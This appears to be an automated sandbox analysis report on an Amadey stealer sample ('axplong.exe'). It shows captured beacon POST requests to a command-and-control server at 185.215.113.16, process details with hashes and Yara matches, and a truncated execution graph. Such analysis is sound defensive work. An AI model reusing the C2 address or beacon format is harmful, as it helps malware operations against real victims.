                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        54192.168.2.652376185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:04.524465084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:05.249052048 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:43:05.252619028 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:05.485574007 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        55192.168.2.652377185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:05.599240065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:06.310586929 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        56192.168.2.652378185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:06.320991993 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:07.055228949 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        57192.168.2.652379185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:07.180129051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:07.908143044 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:07 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        58192.168.2.652380185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:07.917090893 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:08.688188076 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        59192.168.2.652381185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:08.809166908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:09.506697893 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:43:09.509749889 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:09.860450029 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        60192.168.2.652382185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:09.989684105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:10.696933985 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        61192.168.2.652383185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:10.706916094 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:11.436655045 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        62192.168.2.652384185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:11.560424089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:12.329565048 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        63192.168.2.652385185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:12.338247061 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:13.036628962 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        64192.168.2.652386185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:13.146893024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:13.868077993 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:09:41:07
                        Start date:26/09/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0xa40000
                        File size:1'943'552 bytes
                        MD5 hash:CC58B885AC20A4B1CDC8E9174A6E8703
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2268543897.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2181826515.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:09:41:13
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                        Imagebase:0x260000
                        File size:1'943'552 bytes
                        MD5 hash:CC58B885AC20A4B1CDC8E9174A6E8703
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2237964071.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2278205377.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 53%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:09:41:14
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Imagebase:0x260000
                        File size:1'943'552 bytes
                        MD5 hash:CC58B885AC20A4B1CDC8E9174A6E8703
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2295538512.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2255300359.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:8
                        Start time:09:42:00
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Imagebase:0x260000
                        File size:1'943'552 bytes
                        MD5 hash:CC58B885AC20A4B1CDC8E9174A6E8703
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2706394486.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Reset < >
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c44a6659d4d1395607c5014c5b3449cacd489593210fee0abe69bb5dc7947cea
                          • Instruction ID: c587d3ec71c0afbff1ec522cf3856e3e87627a417af62bac6a720b33266638e1
                          • Opcode Fuzzy Hash: c44a6659d4d1395607c5014c5b3449cacd489593210fee0abe69bb5dc7947cea
                          • Instruction Fuzzy Hash: 3AF067B210C120AFA141C181AF18AB767AEF6C57387308C26F643CF1E0E36859446CB1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f292502a51a4aea49d191cd63122b3cff458a5353e1e5e68f851f2d0c4af16ac
                          • Instruction ID: 947215055901046077988ec2a0d30a42b45c829fa14b191b51cfb2e8b31a18e4
                          • Opcode Fuzzy Hash: f292502a51a4aea49d191cd63122b3cff458a5353e1e5e68f851f2d0c4af16ac
                          • Instruction Fuzzy Hash: F9F0B47210D120AFA141C581EF186B73BA6E6C57347308C23F243CF1E0D65459456CA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cace121990eb7a290ee589c759e6f1db9357a9c6a7166277b7e30acc214ec41
                          • Instruction ID: 0c4c592f948f31a265b498668cf5b174d33052cdca497ecf96c528098cae63e6
                          • Opcode Fuzzy Hash: 4cace121990eb7a290ee589c759e6f1db9357a9c6a7166277b7e30acc214ec41
                          • Instruction Fuzzy Hash: B2F0E2B250C120EFA201D595DA8867B77A7BBC22747308C2AF143CF1E1E7659C80ADA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3dcb3cf2c8cc8ee6fec20023bb56b6109f57bfe89a9d32f858b3753c2b30d541
                          • Instruction ID: 03d230e9c9faa7e13fe858f61c4b6c502d1056eb7676eaacb6abeed3e47fda11
                          • Opcode Fuzzy Hash: 3dcb3cf2c8cc8ee6fec20023bb56b6109f57bfe89a9d32f858b3753c2b30d541
                          • Instruction Fuzzy Hash: 6AE02BB200C120DFA241C0D1D74C5373BA7B6962787308C32F143CF1D0D6549C416CA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e843e062887974e5271015d6900f822c270d096d273f2d80842aa414634608f1
                          • Instruction ID: d76efb93da90e3d2793415e9f8797687b59a0affc012ac5903c5ed9399771e81
                          • Opcode Fuzzy Hash: e843e062887974e5271015d6900f822c270d096d273f2d80842aa414634608f1
                          • Instruction Fuzzy Hash: 87E0D8B200D120EF5142C5C1D7186B73BA7BBD62347708C27F247CF5E0D6641840ACA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3adb4d063161cce60e3b95e7fdc9baa1198c1a8a80f68812dabd138aa825799
                          • Instruction ID: 7c0467f46266a1676eba5f6ecbf4da1f42e991e6b385b4a10d7124bd9e91ccbb
                          • Opcode Fuzzy Hash: e3adb4d063161cce60e3b95e7fdc9baa1198c1a8a80f68812dabd138aa825799
                          • Instruction Fuzzy Hash: 8AE068B200C210DFE291C4C0D28CBB73BAABB873387304C2BF2438E1D1D399248999A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5540000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84f74594d79bf8666bffd0e7177b39a99bda7c1e3dd77db932f5def8a2972617
                          • Instruction ID: fb81c2005106e18a14c7f71ae02ea4257ce99a91d74764dd7cc5659516c99583
                          • Opcode Fuzzy Hash: 84f74594d79bf8666bffd0e7177b39a99bda7c1e3dd77db932f5def8a2972617
                          • Instruction Fuzzy Hash: 8FE026F200C120EFB145C4C1E60DAB337AAF6A23383304C0AF1438E1D1C66828406871

                          Execution Graph

                          Execution Coverage:5.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:4.8%
                          Total number of Nodes:609
                          Total number of Limit Nodes:42
                          execution_graph 14017 296beb 14018 296bf7 14017->14018 14029 298aaf 14018->14029 14020 296c26 14021 296c43 14020->14021 14022 296c35 14020->14022 14037 2968bd 14021->14037 14023 296c99 9 API calls 14022->14023 14025 296c3f 14023->14025 14026 296c5d 14028 296c71 ___free_lconv_mon 14026->14028 14040 296c99 14026->14040 14030 298ab4 __fassign 14029->14030 14033 298abf 14030->14033 14052 29d4f4 14030->14052 14049 29651d 14033->14049 14034 29d727 RtlAllocateHeap 14035 29d73a __dosmaperr 14034->14035 14036 298af2 __fassign 14034->14036 14035->14020 14036->14034 14036->14035 14071 29683a 14037->14071 14039 2968cf 14039->14026 14041 296cc4 __cftof 14040->14041 14047 296ca7 __cftof __dosmaperr 14040->14047 14042 296d06 CreateFileW 14041->14042 14048 296cea __cftof __dosmaperr 14041->14048 14043 296d38 14042->14043 14044 296d2a 14042->14044 14121 296d77 14043->14121 14107 296e01 GetFileType 14044->14107 14047->14028 14048->14028 14059 2963f7 14049->14059 14053 29d500 __fassign 14052->14053 14054 29651d __fassign 2 API calls 14053->14054 14055 29d55c __cftof __dosmaperr __fassign 14053->14055 14056 29d6ee __fassign 14054->14056 14055->14033 14057 29d727 RtlAllocateHeap 14056->14057 14058 29d73a __dosmaperr 14056->14058 14057->14056 14057->14058 14058->14033 14060 296405 __fassign 14059->14060 14061 296450 14060->14061 14064 29645b 14060->14064 14061->14036 14069 29a1c2 GetPEB 14064->14069 14066 296465 14067 29646a GetPEB 14066->14067 14068 29647a __fassign 14066->14068 14067->14068 14070 29a1dc __fassign 14069->14070 14070->14066 14072 29685a 14071->14072 14076 296851 14071->14076 14072->14076 14077 29b4bb 14072->14077 14076->14039 14078 29b4ce 14077->14078 14079 296890 14077->14079 14078->14079 14085 29f46b 14078->14085 14081 29b4e8 14079->14081 14082 29b4fb 14081->14082 14083 29b510 14081->14083 14082->14083 14090 29e571 14082->14090 14083->14076 14087 29f477 __fassign 14085->14087 14086 29f4c6 14086->14079 14087->14086 14088 298aaf __fassign 4 API calls 14087->14088 14089 29f4eb 14088->14089 14091 29e57b 14090->14091 14094 29e489 14091->14094 14093 29e581 14093->14083 14097 29e495 __fassign ___free_lconv_mon 14094->14097 14095 29e4b6 14095->14093 14096 298aaf __fassign 4 API calls 14098 29e528 14096->14098 14097->14095 14097->14096 14099 29e564 14098->14099 14103 29a5ee 14098->14103 14099->14093 14104 29a611 14103->14104 14105 298aaf __fassign 4 API calls 14104->14105 14106 29a687 14105->14106 14108 296e3c 14107->14108 14120 296ed2 __dosmaperr 14107->14120 14110 296e56 __cftof 14108->14110 14143 297177 14108->14143 14111 296e75 GetFileInformationByHandle 14110->14111 14110->14120 14112 296e8b 14111->14112 14111->14120 14129 2970c9 14112->14129 14116 296ea8 14117 296f71 SystemTimeToTzSpecificLocalTime 14116->14117 14118 296ebb 14117->14118 14119 296f71 SystemTimeToTzSpecificLocalTime 14118->14119 14119->14120 14120->14048 14166 297314 14121->14166 14123 296d85 14124 296d8a __dosmaperr 14123->14124 14125 2970c9 4 API calls 14123->14125 14124->14048 14126 296da3 14125->14126 14127 297177 RtlAllocateHeap 14126->14127 14128 296dc2 14127->14128 14128->14048 14130 2970df _wcsrchr 14129->14130 14133 296e97 14130->14133 14147 29b9e4 14130->14147 14132 297123 14132->14133 14134 29b9e4 4 API calls 14132->14134 14139 296f71 14133->14139 14135 297134 14134->14135 14135->14133 14136 29b9e4 4 API calls 14135->14136 14137 297145 14136->14137 14137->14133 14138 29b9e4 4 API calls 14137->14138 14138->14133 14140 296f89 14139->14140 14141 296fa9 SystemTimeToTzSpecificLocalTime 14140->14141 14142 